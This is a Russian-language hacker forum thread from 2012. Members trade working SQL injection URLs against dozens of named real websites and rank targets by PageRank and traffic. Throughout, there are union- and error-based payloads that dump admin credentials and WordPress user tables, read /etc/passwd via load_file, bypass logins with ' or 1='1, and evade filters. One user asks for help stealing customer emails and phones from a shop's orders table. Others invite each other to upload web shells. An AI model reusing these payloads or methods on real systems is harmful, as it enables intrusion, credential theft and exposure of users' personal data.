Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins)
Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать
lex1094
lex1094 said:
Нашёл SQL Injections на сайте УФМС России по Приморскому краю, но разрабатывать её не стал.
Вот сама SQL: http://fmspk.ru/news.php?id=222'
Нормально нужно выкладывать, а не это
http://fmspk.ru/news.php?id=222+union+select+1,2,3,table_name,5+fr om+information_schema.tables
lexus5122
lexus5122 said:
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
Правильно пишет, потому что там пусто
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,concat_ws%280x3a,name,ema il,phone%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+orders--
И главное, для подобных вопросов, тут есть отдельная тема, там и спрашивайте
/thread46016.html
lexus5122
02.08.2012, 15:27
lex1094 said:
Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins)
Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать
Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы
Правильно пишет, потому что там пусто
Цитата:
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,concat_ws%280x3a,name,ema il,phone%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+orders--
а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
lexus5122 said:
Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы
а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,email,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,1%209,20,21+from+orders--
Я показал тему для таких вопросов?
и ещё раз
/thread46016.html
Партия "Яблоко"
http://volgograd.yabloko.ru/news/index.phtml?id=-328+UniOn+select+1,2,3,4,5,6,7,8,9,10,table_name,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+i nformation_schema.tables--
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
http://www.mkb10.ru/?class=-14+union+select+concat_ws%280x3a,id,login,password ,root%29+from+u78252.admin--
4 символа
Бинокли
http://www.pronv.us/catalog.php?id=-14 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7 --
Host = www.rae.ru
Российская Академия Естесствознания
PR = 5
TYC = 1500
Inject
Code:
_ttp://www.rae.ru/fs/?section=content&op=show_article&article_id=7789203+and+1=2+union+select+1,2,3,4,5, null,7,null,9,10,11,12,null,null,null,16,17,18,19, 20,21,22,23,24,25,26,null,28,29,null,31,version(), 33
Info
VERSION = 5.5.24-log
USER = sup78user@localhost
DATABASE = fs
BASES:
Code:
information_schema
account
apsc
atmail
club
demo
econf
es1
express
famd
famous
forum
forum10
forum11
forum12
fs
horde
med
monogra
mysql
online
performance_schema
phpmyadmin_gAAfZmC2ngnA
psa
rae
research
rus-sci
science
se
shop
sitebuilder5
social
vak
who
Во все БД есть доступы и они от этих сайтов
1) www.rae.ru PR=5 TYC=1500
2) 15.rae.ru PR=4 TYC=0
3) express.rae.ru PR=3 TYC=0
4) gerb.rae.ru PR=4 TYC=0
5) online.rae.ru PR=3 TYC=20
6) russian-scientists.ru PR=4 TYC=30
7) science-education.ru PR=5 TYC=180
8) www.es.rae.ru PR=4 TYC=20
9) www.famous-scientists.ru PR=5 TYC=1400
10) www.monographies.ru PR=4 TYC=30
11) www.russian-scientists.ru PR=4 TYC=30
ByPass authentication SQL-Injection:
1) _ttp://online.rae.ru/login/auth/
Login = ' or 1='1
Password = ' or 1='1
2) _ttp://www.famous-scientists.ru/login/auth/
Login = admin' or 1='1
Pass = admin' or 1='1
Ну и последняя плюшка...
Админка от 1C Bitrix. Вдруг пасс расшифруете, я не смог =(
_ttp://russian-scientists.ru:8888/bitrix/admin/
З.Ы. Если зальёте шелл - напомните мне в ПМ, что я неудачник =)
saveoursound
http://www.saveoursound.org/news/reader.php?id=-247 union select (select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),2,3,4,5,6, 7,8,9--
Корова
Code:
http://www.korova.ru/humor/viewer.php?id=-32 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 --
MySQL: GET SQLi in param 'id' in URL:http://orgasmof.ru
Code:
http://orgasmof.ru/?id=1%27%20AND%20%28SELECT%203101%20FROM%28SELECT% 20COUNT%28%2A%29%2CCONCAT%280x3a6473763a%2C%28SELE CT%20MID%28%28IFNULL%28CAST%28user%28%29%20AS%20CH AR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6d68743a%2 CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATI ON_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%2 0AND%20%27YQPM%27=%27YQPM
user(): orgasm@localhost
version(): 5.1.49-3
HellFire
05.08.2012, 21:30
Философский портал.
Code:
http://arcto.ru/modules.php?name=News&file=print&sid=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),2,3,4,5,6--
Database Version: 5.1.63
Database name: arctogaia
User name: arctogaia@web.evrazia.org
ТИЦ: 325
PR: 5
Что-то тихо тут...
PR=6
CY=30
http://www.scripts.com/index.php?option=com_user&task=UserDetails&Returnid=1&Itemid=1'+and(select+1+from(select+count(*),concat ((select+(select+(select+concat(0x3c68313e,0x27,un hex(Hex(cast(dev_metatags.id+as+char))),0x3a,unhex (Hex(cast(dev_metatags.option+as+char))),0x27,0x3c 2f68313e)+from+scripts.dev_metatags+limit+0,1)+)+f rom+information_schema.tables+limit+0,1),floor(ran d(0)*2))x+from+information_schema.tables+group+by+ x)a)+and+'1'='1
HellFire
07.08.2012, 01:43
Товары почтой.
Code:
http://zacaz.com/products.php?news_id=1+UNION+SELECT+1,CONCAT(Versi on(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
Вывод в meta.
Database Version: 5.1.63-log
Database name: torgpost_db
User name: torgpost_db@91.206.200.70
ТИЦ: 30
PR: 3
Блого-хостинг.
Code:
http://www.yesblog.ru/blog.php?user=onlinepburriigri¬e=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),4,5,6,7,8,9--
Вывод в title.
Database Version: 5.0.92
Database name: blogsua_yesblog
User name: blogsua_yesblog@localhost
ТИЦ: 40
PR: 2
http://www._photoline.ru/
6-7 К трафа
http://www.photoline.ru/cgi-bin/cr/info1.pl?ind=-8546%20UNION%20ALL%20SELECT%20null,%20null,%20null ,%20null,CHR%2865%29||CHR%28110%29||CHR%28116%29|| CHR%28105%29||CHR%2897%29||CHR%28116%29||CHR%2846% 29||CHR%28114%29||CHR%28117%29,%20null,%20null,%20 null,%20null,%20null,%20null,%20null,%20null,%20nu ll,%20null--
пробелы убрать
Ранее я уже публиковал скулю на private, однако админы это дело отремонтировали, но на место старой приходит две новые...
http://www.private.com/movies/Sex-Slaves-And-FairyTails/999999999+union+select+1,concat_ws%280x3a,table_na me%29,3+from+information_schema.tables+limit+29,1--
HellFire
07.08.2012, 18:50
Газета о жилом и коммерческом фонде.
Code:
http://www.konserg.ru/index.php?category_id=1+UNION+SELECT+1,2,3,CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,5,6,7,8,9,10,11,12,13,14,15,16,17--
information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure
Database Version: 5.1.58-log
Database name: konsergru_kon
User name: konsergru_kon@localhost
ТИЦ: 180
PR: 4
ТМ FreeMarket.ua
FreeMarket.ua - цены на компьютеры, мобильные телефоны, бытовую технику, недвижимость, автомобили и многое другое.
Яндекс тИЦ (CY): 2500
Google PageRank (PR): 6
Alexa Rank: 48,503
MySQL, Error-Based Duplicate entry SQLi
Code:
http://freemarket.ua/today.xml?page=1'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/passwd/**/from/**/t_user/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
5.0.92-log
freesell_new@193.33.212.14
+
раскрытие путей:
Code:
/var/www/freesell/data/www/freemarket.kiev.ua/inc/freemarket.inc.php
шелл не лил
HellFire said:
information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure
на будущее
http://www.konserg.ru/index.php?category_id=-1+UNION%0d%0aSELECT+1,2,3,table_name,5,6,7,8,9,10, 11,12,13,14,15,16,17+from+information_schema.table s+--+
пробелы ток убери.
С болью на сердце и злобой на сисадминов выкладываю эти скули. Работал в сотрудничащей фирме, позвонил им в 2010 году и сообщил про уязвимости в движке, буквально ткнул носом.
Сказали, да-да, всё исправим...
Two years later... А воз и ныне там...
Сайт web-gorod.net
Code:
_ttp://web-gorod.net/index.php?id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.5.3-55
DB = pzdobnin_wg
Таблица с админами = userlist
Сайт web-gorod-brn.ru
Code:
_ttp://web-gorod-brn.ru/view_post.php?cat=16&id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.1.50-lk-log
DB = webgorodru
Таблица с админами = userlist
На главном сайте ещё куча всяких городов... Разбирайте.
Пассы в plain-text
Га-Ноцри
09.08.2012, 21:51
Небольшая подборка.
PHP:
http://www.conciergequestionnaire.com/ur_here/story.php?id=-196+union+select+concat_ws(0x03a,table_schema,tabl e_name,column_name),2,3,4,5,6,7,8,9,10,11,12,13+fr om+information_schema.columns --
PHP:
http://www.gumblossombabies.com/item.php?itemid=-1+union+select+1,2,3,4,5,load_file('/etc/passwd'),7--
PHP:
http://qiyuangh.g.178.com/main.php?act=charactorlist&user_id=1+and+extractvalue(rand(),concat(0x3a,(sel ect+concat(0x3a,table_name)+from+information_schem a.tables+limit+0,1)))
PHP:
https://www.nensa.net/calendar/index.html?id=-1252+union+select+1,2,concat_ws(0x03a,ID,user_logi n,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+nensa_forum.wp_users--
PHP:
http://pazoogle.com/grafton-hills/Admin/getFile.php?db=sites&table=siteMediaFiles&fileId=-411'+/*!union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13*/--+h
Скулю 10 года пофиксили, но нарастили пузомерки и открыли новые доступы (=
Яндекс тИЦ: 100
Page Rank: 4
Яндекс Каталог: True
PHP:
http://www.magniflex.ru/shop/checkout2.php?id=3+AND+extractvalue(1,user())+--+
SQL 4.1.22 => таблицы подбираем
Code:
http://tvpc.com/Channel.php?ChannelID=1+UNION+SELECT+1,2,ChannelID ,4,5,ChannelPassword,7,version(),9+from+Channels+L IMIT+0,1
Таблицы:
Code:
http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TAB LES+--
Колонки:
Code:
http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.CO LUMNS+WHERE+TABLE_NAME=0x...+--
20к траффика
http://www.zavarka.ru/texts/cgi-bin/show.cgi?id=1+union+select+1,version(),3,4,5,6,7,8 +--+
админка /admin/admin.php
http://www.fitnesshut.pt/clube.php?id=-1/**/union/**/select/**/1,concat_ws(user(),database(),version()),3--
PR3 AR516,938
fitnetj3_websitefitnetj3_admin@localhost5.1.63-community-log
http://www.kitefestpasirgudang.com/Content.php?id=-2+union+select+concat_ws%280x3a,member_id,member_l ogin,member_password%29,2,3,4+from+members%20limit %200,1--
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
http://www.hsabc.org/content.php?id=-10+union+select+1,2,concat%28password,0x3a,usernam e%29,4,5,6,7,8,9,10,11,12,13,14+from+members--
http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f %6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2 c%35%2c%36%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c% 33%2d%2d%20%31
pеtеrhost обходится полным urlencode запроса
http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f %6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2 c%35%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61% 2c%75%73%65%72%6e%61%6d%65%2c%75%73%65%72%5f%70%61 %73%73%77%6f%72%64%29%2c%37%2c%38%2c%39%2c%30%2c%3 1%2c%32%2c%33%20%66%72%6f%6d%20%70%68%70%62%62%5f% 75%73%65%72%73%20%6c%69%6d%69%74%20%31%2c%31%2d%2d %20%31
PHP:
http://www.revistaklan.com/material.php?id=-1074%27+union+select+1,2,3,load_file(0x2f6574632f7 06173737764),5,6,7,8,9,10,11,12,13,14,15,16,17--+f
ТИЦ-10(R2) PR-5 AR-811,760DMOZ
Интернет магазин техники - NewComp. Админы были поставлены в известность, но никакой реакции.
Login:
Code:
http://new comp.dp.ua/ ?d=-1+union+select+login+fr om+users+--+
Password:
Code:
http://new comp.dp.ua/ ?d=-1+union+select+password+fr om+users+--+
Skofield
24.08.2012, 20:38
offtop:
sql.inject, http://netfaq.ru/mysql-book/concat_ws
Га-Ноцри
25.08.2012, 04:02
PR == 6; ТИЦ == 1200; DMOZ, ЯK == true;
PHP:
http://www.mi.ras.ru/index.php?l=1&c=1'+union+select+1,2,3,4,load_file('/etc/passwd')--+h
PR == 2;
PHP:
http://www.ibanklive.com/index.php?page=contact_us_existing_03&mode=contact&ticket_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6 --
TИЦ && PR == N/A;
PHP:
http://video.newlifechurch.org/podcast/index.php?pid=-11+union+select+1,file_priv,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from +mysql.user --
http://video.newlifechurch.org/info.php
HellFire
26.08.2012, 08:40
Асток-Пресс. Санкт-Петербургская рекламно-информационная газета.
Code:
http://astok-press.ru/index.php?section=news.php&news_id=1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A 2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.1.51-community-log
Database name: tmp_astok
User name: tmp_astok@localhost
ТИЦ: 240
PR: 4
Авторский сайт Соболевой Ольги. Методики обучения детей.
Code:
http://www.metodika.ru/bookitem.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13--
Вывод в title.
Database Version: 5.0.51a-3ubuntu5
Database name: bi78
User name: bi78-sql@localhost
ТИЦ: 300
PR: 4
Dead Hackers Society.
Code:
http://dhs.nu/news.php?t=single&ID=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21--
Database Version: 5.1.63-0+squeeze1
Database name: ae
User name: ae@localhost
ТИЦ: 0
PR: 4
Украинский женский сайт.
Code:
http://ladys.in.ua/index.php?page=4&cat=4&sled=800&enda=820&bl=1&num=1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User())--
Database Version: 5.1.60
Database name: oleg_ladys
User name: oleg_ladys@localhost
ТИЦ: 0
PR: 0
Code:
http://www.coorslightpr.com/event.php?id=-28+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9+from+information_schema.tables+where+table_ schema=database()--
ТИЦ0
PR4
AR6,313,469
http://www.eckerd.edu/news/index.php?f=detail&id=3181-999.9+ union+select+ 1,2,version(),4 ,5,6,7,8,9,10,11, 12,13,14--
PR=6DMOZ
AR=289917
5.1.52-log
http://www.mathsrevision.net/alevel/pages.php?page=19-999.9+union+select+1,2,3,4,5,version()--
PR=6
AR=421004
4.1.22-standard-log
Slanger.ru — Словарь молодежного, компьютерного и другого сленга и жаргона
http://slanger.ru/?mode=library&r_id=-9%20union%20select%201,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),3,4,5,6,7--
5.1.58-log slangerru@localhost slangerru pc-linux-gnu
PHP:
http://www.aldeburghsuffolk.com/promotion.php?id=-14/**/union/**/select/**/1,2,3,4,5,6,7,concat_ws(user(),database(),version( )),9--
PR2
web91-abaweb91-aba@localhost5.1.57-log
PHP:
http://www.cherry-italy.com/en/promotion.php?page=&id=-34/**/union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7 ,8,9,10,11,12,13,14,15--
PR1
chitaly_webchitaly_web@localhost5.1.54
pr8
google: 7 080 000
http://www.unizar.es/aguariospueblos/es/eje.php?id_eje=-2+union+select+1,2,3,4,version(),6,7,8+--+
Code:
http://www.buypc.ru/promo.php?id=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),version()),5,6
Тиц 10
testroot@zvm4.host.ru4.0.27
Code:
http://centralparkjakarta.com/v2/promo.php?st=5&id=-478%27+union+select+1,2,group_concat(admin_id,0x03 a,username,0x03a,password),4,5,6,7,8+from+admin--+f
PR5
PR == 6, ТиЦ == 0
Code:
http://www.npvideo.com/channel.php?id=-1 '+union+select+1,concat_ws(0x3a,user_login,user_pa ss),3,4,5,6,7,8,9,10,11,12,13,14+from+wp_users+--+
PR == 4, ТиЦ == 0
Code:
http://www.yna.edu/5771_shabbaton.php?id=-1'+union+select+1,group_concat (column_name+separator+0x3a),3,4,5+from+informatio n_schema.columns+where+table_name='users'+--+
PR == 4, ТиЦ == 0
Code:
http://www.bostonhigashi.org/about.php?id=-1+union+select+1,2,concat_ws (0x3a3a,database(),version(),user())+--+
PR == 3, ТиЦ == 10
Code:
http://av tech.uz/detailed?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,username,password),16,17,18,19,20,21, 22,23,24,25,26+from+users+limit+1,1+--+
PR == 0, ТиЦ == 0
Code:
http://www.neo group.uz/news.php?id=-6'+union+select+1,concat_ws(0x3a,log,pas5),3,4+fro m+administrators+--+
Га-Ноцри
01.09.2012, 02:21
ТИц == 10, PR == 6, DMOZ == true;
PHP:
http://www.com.edu/continuing-education/courses.php?id=18+and+extractvalue(rand(),concat(0 x3a,version(),0x3a,user())) --
pcs-consultants.com
ТИЦ: 0
PR: 2
Code:
http://pcs-consultants.com/productInfo.php?productID=115'
INFO
Code:
Host IP: 216.177.141.100
Web Server: Apache
Powered-by: PHP/5.2.14
DB Server: MySQL
Current DB: mbstech_newstore
Data Bases:
information_schema
mbstech_lpages
mbstech_newstore
mbstech_store
winstrool
04.09.2012, 23:28
_http://www.impuls-fitness.pl/index.php?id=-82+union+select+1,%28select%20concat%280x00,table_ schema,0x3a,table_name,0x0a,user%28%29,0x3a,versio n%28%29,database%28%29%29%20from%20information_sch ema.columns%20where%20column_name=0x6C6F67696E%20l imit%200,1%29,3,4,5,6,7,8,9+--+
Га-Ноцри
07.09.2012, 03:22
PR == 4;
PHP:
http://roc.nccu.edu.tw/histroy3.php?id=-94+union+select+1,load_file('/etc/passwd'),3,4,5,6,7+--+
PR == 3;
PHP:
http://lcd.efn.unc.edu.ar/sitio_e/ficha_miembros.php?id=-9+union+select+1,2,3,4,load_file('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22+--+
ТИц == 40, PR == 2, DMOZ == true;
PHP:
http://www.chihua.ru/main.phtml?clon=main&rubrica=210&lang=rus&lastposit=0&id=-1215+union+select+1,2,version(),4--
Profexor
07.09.2012, 05:56
ТИЦ70 PR2
PHP:
http://www.bt-motors .ru/vacances.php?id=1-999.9 union select 1,PASSWORD,3,4,5,5,7,8,9,10, 11,12 from b_user --
Host
Code:
www.e-gorod.ru/Exhibitions/
Inject
Code:
POST
Login = admin' or substring((@@version),1,1)='5
Pass = admin' or substring((@@version),1,1)='5
ByPass Authentication
Code:
POST
Login = admin' or 1='1
Pass = admin' or 1='1
PR =5
TYC = 350
nemaniak
08.09.2012, 15:39
omdsz.ro PR-5
Code:
www.omdsz.ro/hu/index.php?menu_id=&goto=forum&do=showtopicsbycategory&category_id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7+--+
Code:
5.1.63-cll:omdsz_omdsz@localhost:omdsz_omdsz
renewsindia.com PR-5
Code:
www.renewsindia.com/goto.php?news_id=-3453+union+select+concat_ws(0x3a,version(),user(), database()),2--
Code:
5.0.92-log:renews07012011@97.74.144.190:renews07012011
в адр строке
best.eng.auburn.edu PR-5
Code:
best.eng.auburn.edu/stored_procedures/folder-manager/create-folder.php?folder=714+union+select+1,2,3,concat_ws (0x3a,version(),user(),database()),5,6,7,8,9+--+
Code:
5.0.51a-3ubuntu5.8:tdp0001@localhost:tpatterson
кто зальет шелл черканите в приват
PHP:
http://www.familyfed.org/news/index.php?id=-325%27+union+select+1,2,3,group_concat(schema_name ),5,6,7,8,9,10,11,12,13,14,15,16,17+from+informati on_schema.schemata--+f
ТИЦ-10(R2)
PR-NA
AR-381,015
DMOZ-> Society> Religion_and_Spirituality> Christianity> Denominations> Unification_Church
cockyboys - gay site
HTML:
http://www.cockyboys.com/viewmodel.php?id=-90/*!+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25*/
ТИЦ-0(R0)
PR-3
AR-107,591
трафа выше 40к http://grapher.compete.com/site_media/snapshot/cockyboys.com_uv_us_310.png
http://www.naturalpoint.it/home.php?pag=prd&acc=715&id=-90%27+union+select+1,2,concat_ws(user(),database() ,version()),4,5,6,7,8,9,10,11,12,13+--+
ТИЦ0(R0)
PR4
AR3,270,288
naturalpointnaturalpoint@172.16.0.4 5.1.62-log
nemaniak
13.09.2012, 23:00
imex-frankfurt.com PR-6
Code:
www.scientific-computing.com/news/news_story.php?news_id=1763+and+4=substring((SELEC T+version()),1,1)+--+
ushl.com PR-6 штатская хоккейная лига
Code:
www.ushl.com/news.php?news_id=1234'+and+5=substring((SELECT+ver sion()),1,1)+--+
imex-frankfurt.com PR-6
Code:
www.imex-frankfurt.com/vex-2012/exweb.php?back=vexsearch.php$$letter=d$action=alph a&uid=236233'+union+all+select+concat_ws(0x3a,versio n(),user(),database())+--+
Code:
5.1.41-3ubuntu12.10-log:root@localhost:imex2012_live
http://www.adal.com.pl/product.php?id=-75+union+select+concat_ws(id,0x3a,login,0x3a,haslo ),2+from+uzytkownicy+--+f
PR - 4
http://www.womenlivingnaturally.com/product.php?id=-21'+union+select+1,2,3,4+--+f
PR - 2
winstrool
15.09.2012, 08:11
otdelklt_kultura@localhost:5.0.67-communitytdelklt_otdelkultura
http://otdelkultura-tashla.ru/pasport.php?id_pod=-10%27+union+select+concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29+--+
pofigclient@localhost:5.0.77ofig
http://www.pofigist.ca/kitchen/thread.php?id=658003+OR+%28SELECT+COUNT%28*%29+FRO M+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GR OUP+BY+CONCAT%28MID%28%28select+concat_ws%280x3a,u ser%28%29,version%28%29,database%28%29%29%29,1,63% 29+,+%20FLOOR%28RAND%280%29*2%29%29%29+--+
client2@boscgi4102.eigbox.net:5.0.91-log:confa
http://www.figvam.ca/cloud/thread.php?id=599888+OR+%28SELECT+COUNT%28*%29+FRO M+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GR OUP+BY+CONCAT%28MID%28%28select+concat_ws%280x3a,u ser%28%29,version%28%29,database%28%29%29%29,1,63% 29+,+%20FLOOR%28RAND%280%29*2%29%29%29+--+
http://www.pro-hyip.com/?a=refform&id=-1146+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36+--+
winstrool
16.09.2012, 12:02
http://www.invita-rus.ru/print.php?id=3news&lang=1&idtime=1283371200+and+1=0+union+select+1,2,%28sele ct%28@x%29from%28select%28@x:=0x00%29,%28select%28 0%29from%28information_schema.columns%29where%28ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 %29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,column_name%29%29% 29%29x%29,4,5,6,7,8,9+--+
Сливки БД городов ка на ладони!)
http://sibrabota.ru/teach/index.php?target=center_details&id_rubric=3&id_center=8+and+1=0+union+select+1,%28select%28@x% 29from%28select%28@x:=0x00%29,%28select%280%29from %28information_schema.columns%29where%28table_sche ma!=0x696e666f726d6174696f6e5f736368656d61%29and%2 80x00%29in%28@x:=concat%28@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name%29%29%29%29x%2 9,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,version% 28%29,database%28%29%29,0+--+
антибоян по sibrabota.ru
/threadnav21336-271-10.html
kingbeef
16.09.2012, 15:26
Ненавижу 4 ветку.
PR 2
http://www.hobbyradio.it/pop.php?ID=-1161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,user(),database(),version()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58--+f
root@localhost:dbhobbyradio:4.0.27-standard
http://www.skpb.ru/content.php?id=20&news=NULL'+union+Select+/*!group_concat(table_name)*/,2,3,4+/*!from*/+/*!information_schema.tables*/+/*!where*/+table_schema=database()--++--
http://www.anturaj.com/news.php?NewsID=-19+union+select+1,2,table_name,4,5+from+informatio n_schema.tables--
тиц 10
http://spicelife.ru/order.php?id=-1'%20UNION%20SELECT%201,2,3,TABLE_NAME%20,5,6%20FR OM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1%20--
PR 1
www.marmota.com
Code:
http://www.marmota.com/news.php?id=-28/**/union/**/select/**/1,2,concat_ws(user(),database(),version()),group_c oncat(schema_name)/**/from/**/information_schema.schemata--
PR4
information_schema,marmota,test_teamrec
marmotamarmota@localhost5.5.27
www.antidoping.hk
Code:
http://www.antidoping.hk/news.php?target=news_detail&id=-28/**/union/**/select/**/1,2,User,Password+from+mysql.user--
PR5
File_priv - Y
antidopingroot@localhost5.5.16-log
nhlegendsofhockey.com
Code:
http://nhlegendsofhockey.com/news.php?id=-28+union+select+1,2,3,concat_ws(user(),database(), version()),5,6,7,8,9,10--
PR2
legendslegends@localhost5.0.77
http://www.unive.it/nqcontent.cfm?a_id=63&gruppo=0&event_id=3040188+or+1+in(utl_inaddr.get_host_name( (SELECT+uidnumber||chr(58)||password+FROM+ACCOUNT+ where+rownum=1+and+uidnumber!='150791')))
http://www.ipag.net.ua/kat.php?r=-78+union+select+1,2,table_name+from+information_sc hema.tables--
тут можно слямзить огого..........
Га-Ноцри
25.09.2012, 02:03
ТИц == 10, PR == 7;
PHP:
http://www.vuzf.bg/?Template=VUZFActualNewsView&RecordID=239&LanguageID=2+and+extractvalue(rand(),concat(0x3a,v ersion(),0x3a,user()))--
ТИц == 30, PR == 2;
PHP:
http://protivoradar.ru/product.php?id=-25+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13--
Яндекс тИЦ (CY) 130
Google PageRank (PR) 4
Code:
http://www.shokoladnayafabrika.ru /afisha/afisha.php?id=465+union+select+1,2,version(),4,5,6 ,7,8,9--
Google PageRank (PR) 2
Яндекс тИЦ (CY) 10
Code:
http://www.sozh-stroy.ru/projects.php?id=-8+union+select+1,version(),3,4,5,6--
http://www.infocajeme.com/humor.php?id=77'+uinon+select+1,2,version(),4,5,6, 7,8,9,10,11,12%20,13--
pr == 2
lxtv.com
http://lxtv.com/search/?search=icecream&cid=62&sid=5+or+1+group+by+concat%28%28select+version%28% 29%29,0x00,floor%28rand%280%29*2%29%29having+min%2 80%29+or+1--+
5.0.77
(CY) 0
(PR) 7
++++++++++++++++++++++++++++++++++++++++++++++++
www.urbandrinking.com
http://www.urbandrinking.com/game.php?ID=42%27+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
5.5.25a-log
